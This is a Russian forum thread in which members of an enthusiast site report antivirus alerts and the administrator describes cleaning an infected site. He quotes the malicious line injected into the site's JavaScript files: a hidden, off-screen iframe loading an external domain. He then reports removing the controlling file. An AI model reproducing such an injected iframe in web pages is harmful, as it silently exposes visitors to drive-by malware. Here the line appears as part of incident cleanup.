Добро пожаловать, Гость Лучший выбор для увлеченных 19 Апреля, 2024, 06:15
Пожалуйста, войдите или зарегистрируйтесь.

Расширенный поиск  

Автор Тема: ФОРУМ и САЙТ: новости обновлений, проблемы, жалобы...  (Прочитано 152995 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Alex_Wolf

  • Оффлайн Оффлайн
  • Сообщений: 709
    • Железнодорожный МО

    • Алексей

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #90 : 08 Января, 2013, 09:22 »

да я юморнул, а ты всерьёз!!!  |-=
Ну дык и я не без смайликов  ::)

Опять вирусная атака, причём вирусы похоже разные! Кто врубается, ну объясните как так:
 я уж и не помню когда вирусов ловил, а тут 1-2 раза в неделю в последнее время и все на этом сайте  >:(
А чего не понятного?! Новый форум, нужно ставить заплатки. Это админу работы добавит.
Записан
Ноги, крылья ?! .... Главное хвост !!!!!

snap

  • Оффлайн Оффлайн
  • Сообщений: 61
    • Хабаровск

    • Игорь

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #91 : 08 Января, 2013, 10:02 »

А чего не понятного?! Новый форум, нужно ставить заплатки.Это админу работы добавит. 
Проблемы начались ещё до обновления. И пока я вижу беспокойство только у пользователей.
Записан

CANDR

  • Оффлайн Оффлайн
  • Сообщений: 1,397
    • Ясногорск Тульская обл

    • Андрей

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #92 : 08 Января, 2013, 10:59 »

А чего не понятного?! Новый форум, нужно ставить заплатки.Это админу работы добавит. 
Проблемы начались ещё до обновления. И пока я вижу беспокойство только у пользователей.
И беспокойство растёт! Почти при каждом входе Аваст кого-то ловит!
Записан
Если что-то само плывёт к вам в руки, присмотритесь - возможно оно просто не тонет...

snap

  • Оффлайн Оффлайн
  • Сообщений: 61
    • Хабаровск

    • Игорь

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #93 : 08 Января, 2013, 11:03 »

А тут вон ваще здец: http://forum.kalibrgun.ru/index.php?topic=2038.0;topicseen   8)
Записан

pfm

  • Оффлайн Оффлайн
  • Сообщений: 49
Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #94 : 08 Января, 2013, 14:20 »

предыдущий дизайн куда лучше был, этот мрачноват, мягко говоря..
Записан

snap

  • Оффлайн Оффлайн
  • Сообщений: 61
    • Хабаровск

    • Игорь

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #95 : 08 Января, 2013, 14:22 »

Обещали что можно будет выбрать.
Записан

Alex_Wolf

  • Оффлайн Оффлайн
  • Сообщений: 709
    • Железнодорожный МО

    • Алексей

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #96 : 08 Января, 2013, 16:04 »

Вот читаю я ваши сообщения про вирусы с форума и удивляюсь -ГДЕЕЕЕЕ ?????!!!!  Я собственно кроме этого форума ни куда не лазию по и-нету и аваст у меня стоит уже не первый год и.... тишина !!!!! У меня аваст на форум не ругается. Вывод - подцепили вы вируса явно где-то еще, а не на форуме. Так, что лечите СВОИ компы и не суйте что ни попадя куда ни попадя  ;D
Поверьте, я сам занимался инф. сетями и сделал для себя вывод - если сам не запустишь на свой комп вирус, то хрен он залезет через антивирус. А лезут вирусы обычно когда пытаешься крякнуть какую-нить прогу. И вот эти крякалки (генераторы ключей) обычно нашпиговывают вирусами. Еще бывает вирусы подвешивают на какие-нить картинки - жмешь на открытие картинки, а вместе с ней подсаживается вирус в комп. Ну и все в таком духе. В общем пока сам не запустишь вирусягу - хрен он прорвется через защиту.
Записан
Ноги, крылья ?! .... Главное хвост !!!!!

Vlad9869 

  • Оффлайн Оффлайн
  • Сообщений: 978
    • Смоленск

    • Алексей

    • Сверчок 1526

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #97 : 08 Января, 2013, 16:10 »

У меня нод молчит.
Записан
Представитель  KalibrGun г. Смоленск

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #98 : 08 Января, 2013, 16:19 »

У меня нод молчит.

Вот читаю я ваши сообщения про вирусы с форума и удивляюсь -ГДЕЕЕЕЕ ?????!!!!  Я собственно кроме этого форума ни куда не лазию по и-нету и аваст у меня стоит уже не первый год и.... тишина !!!!! У меня аваст на форум не ругается. Вывод - подцепили вы вируса явно где-то еще, а не на форуме. Так, что лечите СВОИ компы и не суйте что ни попадя куда ни попадя  ;D
Поверьте, я сам занимался инф. сетями и сделал для себя вывод - если сам не запустишь на свой комп вирус, то хрен он залезет через антивирус. А лезут вирусы обычно когда пытаешься крякнуть какую-нить прогу. И вот эти крякалки (генераторы ключей) обычно нашпиговывают вирусами. Еще бывает вирусы подвешивают на какие-нить картинки - жмешь на открытие картинки, а вместе с ней подсаживается вирус в комп. Ну и все в таком духе. В общем пока сам не запустишь вирусягу - хрен он прорвется через защиту.

Вирус на форуме есть... заражены все джава-скрипты сайта(не только форума) причем во все добавляется одна строчка "docment.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://cwdgxf.ddn_s.name/67b6be430c7c.V0yi5?13" height="500" width="500"></iframe>')" (адреса каждый раз разные)
Однако что сцуко характерно... пять файлов поправишь, пока правишь шестой - первые пять опять заражены...
пока чешу репу...
Кстати нод и симантек действительно молчат - словил блокировку винды и домашним и рабочим компом... не понятное дело что это блокировка мне что чих... но вот как форум вычистить пока не знаю... и заражен он(сайт) походу с начала декабря а то и ноября судя по логам...
« Последнее редактирование: 08 Января, 2013, 16:23 от Nightcat »
Записан

denisimoos

  • Оффлайн Оффлайн
  • Сообщений: 120
    • СПб, Ржевка

    • Денис

    • само совершенство-2

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #99 : 08 Января, 2013, 16:23 »

это происки эдганаводов :D
Записан
"Jedem das Seine"

snap

  • Оффлайн Оффлайн
  • Сообщений: 61
    • Хабаровск

    • Игорь

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #100 : 08 Января, 2013, 16:30 »

Я собственно кроме этого форума ни куда не лазию по и-нету

Прикинь, а если вообще инет не включать? 8)
... и заражен он(сайт) походу с начала декабря а то и ноября судя по логам...
Как я и говорил((
Спасибо тебе здравый человек, с твоей помощью думаю избавимся!

Записан

Alex_Wolf

  • Оффлайн Оффлайн
  • Сообщений: 709
    • Железнодорожный МО

    • Алексей

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #101 : 08 Января, 2013, 19:16 »

Однако что сцуко характерно... пять файлов поправишь, пока правишь шестой - первые пять опять заражены...
пока чешу репу...
Сталкивался с таким червем, но на локальной своей машинке. Антивиры хвосты червя вылавливают, уничтожают, а после перегруза опять все вылазит. Помогли на сайте, который с касперским дружит активно. Там две проги скачал, а логи от сканирования выкладывал на форум. Там же на форуме мне скидывали скрипт (конкретно под мою ситуацию) и с его помощью вычистил комп. А уже хотел винду сносить.
Записан
Ноги, крылья ?! .... Главное хвост !!!!!

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #102 : 08 Января, 2013, 20:18 »

Однако что сцуко характерно... пять файлов поправишь, пока правишь шестой - первые пять опять заражены...
пока чешу репу...
Сталкивался с таким червем, но на локальной своей машинке. Антивиры хвосты червя вылавливают, уничтожают, а после перегруза опять все вылазит. Помогли на сайте, который с касперским дружит активно. Там две проги скачал, а логи от сканирования выкладывал на форум. Там же на форуме мне скидывали скрипт (конкретно под мою ситуацию) и с его помощью вычистил комп. А уже хотел винду сносить.
Беда в том что на сайте и форуме суммано около 200(188 если быть точным) файлов зараженных... и код в них хоть и схожий но разный и заменить их надо все одновеменно иначе лечение не сработает... а у меня мозги с похмелья :)
Записан

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #103 : 09 Января, 2013, 02:15 »

Мда, не этими работами я рассчитывал занять сегодняшний день... думал с лого разобраться да и еще с несколькими пунктами, а в результате день насмаку да и решения пока нет... хотя некоторое понимание появилось, правда не хватает кое-каких прав для экспериментов.
Чтобы вы не думали что мы такие уникальные: http://joomlaforum.ru/index.php/topic,132330.msg1253260.html#msg1253260
Беда в том, что головной сайт (не форум)  сделан, с этой "распрекрастной" джумлой... бои с бякой будут тяжелыми и с непонятным финалом...
« Последнее редактирование: 09 Января, 2013, 02:46 от Nightcat »
Записан

bRUtality

  • Оффлайн Оффлайн
  • Сообщений: 205
    • Нижний Новгород

    • Юрий

    • HW40

    • Cricket #00770

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #104 : 09 Января, 2013, 11:15 »

http://seodemotivators.ru/wp-content/uploads/2011/03/joomla.jpg
ФОРУМ и САЙТ: новости обновлений, проблемы, жалобы...
Записан

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #105 : 09 Января, 2013, 12:36 »

[!]

Ну управляющий вирусами файл я, путем курения логов, вроде отловил... если до ночи те чистые js- скрипты которые я положил сейчас на форум так и останутся чистыми, то можно считать, что эту дырку я прикрутил...  1110101011

Ну и до кучи: управленческий файл вируса обитал в папке images основного сайта(весьма характерно для этой гадости). Когда появился там не знаю, но когда я только приступал к работе(получив пароли от сайта) я сделал фулл бэкап - данный файл так же вошел в бэкап  >:(
« Последнее редактирование: 09 Января, 2013, 15:57 от Nightcat »
Записан

Miksa 

  • Оффлайн Оффлайн
  • Сообщений: 1,283
    • Питер-Юг

    • Миха

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #106 : 09 Января, 2013, 14:40 »

смотрю фенечки всякие появляются - всё краше и краше!!! [!] [!] [!]
Записан
Большая просьба в личку не писать - она заблокирована.

sorokin2007

  • Оффлайн Оффлайн
  • Сообщений: 104
    • Москва

    • Александр

    • Cricket 1261Пифпавыч edition

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #107 : 09 Января, 2013, 14:44 »

Это да, красив выходит.
Вот не было меня все праздники, приехал, открыл и ах....))))
Записан
One shot-one kill....и ребенок накормлен

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #108 : 09 Января, 2013, 14:46 »

Спасибо, друзья!
Работаем потихоньку :)
Записан

denisimoos

  • Оффлайн Оффлайн
  • Сообщений: 120
    • СПб, Ржевка

    • Денис

    • само совершенство-2

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #109 : 09 Января, 2013, 17:14 »

а чего то иконка скайпа пропала? починится?
Записан
"Jedem das Seine"

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #110 : 09 Января, 2013, 17:29 »

а чего то иконка скайпа пропала? починится?

Ща, вирус до конца прибью - займусь... проблему вируса, кажется решил, тестю пока...

А тут вон еще провайдер козу подкинул - сайт отключил... а мне без полной админки пришлось методом научного тыка выяснять за что... оказывается переполнили квоту места на сайте...
Записан

KAWAzimodo

  • Оффлайн Оффлайн
  • Сообщений: 1,292
    • Большая Деревня. Таганка

    • Митенька

    • Cricket 1066 перествол

    • Colibri взрослая 5,5/450/...139 про

    • языческое отродье

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #111 : 09 Января, 2013, 21:47 »

Вот честно, эти маленькие логоТИПчики калибровские (обновление разделов) какие то они
корявенькие, не презентабельные что ли и бледнючие, да и их колличество, воспринимаемое
единоразово, как то на фетиш смахивает (... в каждом углу свечка ...). Его достаточно одного,
крупного, яркого в шапке.  :-X
Записан
Если ты хочешь иметь то что никогда не имел, тебе придется делать то, что никогда не делал ...

Антониус

  • Оффлайн Оффлайн
  • Сообщений: 611
    • МО Одинцово

    • Антон

    • Raptor 5.5 коротыш

    • + Sightron SIII 16х42 MMD

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #112 : 09 Января, 2013, 22:05 »

Вчера, думаю, дай перед сном зайду на форум посмотрю что новенького. Вижу о в конферец-зале сообщения появились. Тыкнул на почитать. Хлоп и на тебе банер.  >:( Пошел спать.

 Хорошо что банер старенький был, пароли под него подобраны.
Записан

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #113 : 09 Января, 2013, 23:15 »

Вчера, думаю, дай перед сном зайду на форум посмотрю что новенького. Вижу о в конферец-зале сообщения появились. Тыкнул на почитать. Хлоп и на тебе банер.  >:( Пошел спать.

 Хорошо что банер старенький был, пароли под него подобраны.

Приношу свои извинения! Проблема была локализована и устранена! А вообще мне еще долго придется затыкать дырки в безопасности головного сайта  :'(

Вот честно, эти маленькие логоТИПчики калибровские (обновление разделов) какие то они
корявенькие, не презентабельные что ли и бледнючие, да и их колличество, воспринимаемое
единоразово, как то на фетиш смахивает (... в каждом углу свечка ...). Его достаточно одного,
крупного, яркого в шапке.  :-X

Принял во внимание, но хотелось бы послушать мнение и других... - если это общее мнение - уберем.


Народ, я внес некоторые изменения  шапку форума - есть у кого-нить монитор с разрешением 1920? можете скриншотик сделать? А то мне с моего ноута 15ти дюймового не все удается предположить.
Записан

denisimoos

  • Оффлайн Оффлайн
  • Сообщений: 120
    • СПб, Ржевка

    • Денис

    • само совершенство-2

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #114 : 09 Января, 2013, 23:23 »

2560 x 1440
такое подойдёт?
Записан
"Jedem das Seine"

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #115 : 09 Января, 2013, 23:27 »

2560 x 1440
такое подойдёт?
Любое больше 1280 :)
Записан

denisimoos

  • Оффлайн Оффлайн
  • Сообщений: 120
    • СПб, Ржевка

    • Денис

    • само совершенство-2

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #116 : 09 Января, 2013, 23:29 »

 1110101011
Записан
"Jedem das Seine"

Nightcat

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #117 : 09 Января, 2013, 23:34 »

1110101011

Ахренеть :(
Пошел ставить сафарю...
Записан

denisimoos

  • Оффлайн Оффлайн
  • Сообщений: 120
    • СПб, Ржевка

    • Денис

    • само совершенство-2

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #118 : 09 Января, 2013, 23:36 »

1110101011

Ахренеть :(
Пошел ставить сафарю...
сафаря это крутота [!]
Записан
"Jedem das Seine"

Антониус

  • Оффлайн Оффлайн
  • Сообщений: 611
    • МО Одинцово

    • Антон

    • Raptor 5.5 коротыш

    • + Sightron SIII 16х42 MMD

Re: НОВЫЙ ФОРУМ(версия) и новый вид
« Ответ #119 : 09 Января, 2013, 23:43 »

Вчера, думаю, дай перед сном зайду на форум посмотрю что новенького. Вижу о в конферец-зале сообщения появились. Тыкнул на почитать. Хлоп и на тебе банер.  >:( Пошел спать.

 Хорошо что банер старенький был, пароли под него подобраны.

Приношу свои извинения! Проблема была локализована и устранена! А вообще мне еще долго придется затыкать дырки в безопасности головного сайта  :'(



Это не беда. 8) Случай на днях. Коллега на работе тоже поймала банер. Так она за ремонт 1000 рублей отдала. И еще хотела смс отправить ;D а то через 12 часов карачун бы настал компу. Я бы ей помог, но на выходных был. Поржал когда рассказали. П.С. хорошо когда знаешь что делать.
Записан
 

Страница сгенерирована за 0.153 секунд. Запросов: 27.

Locations of visitors to this page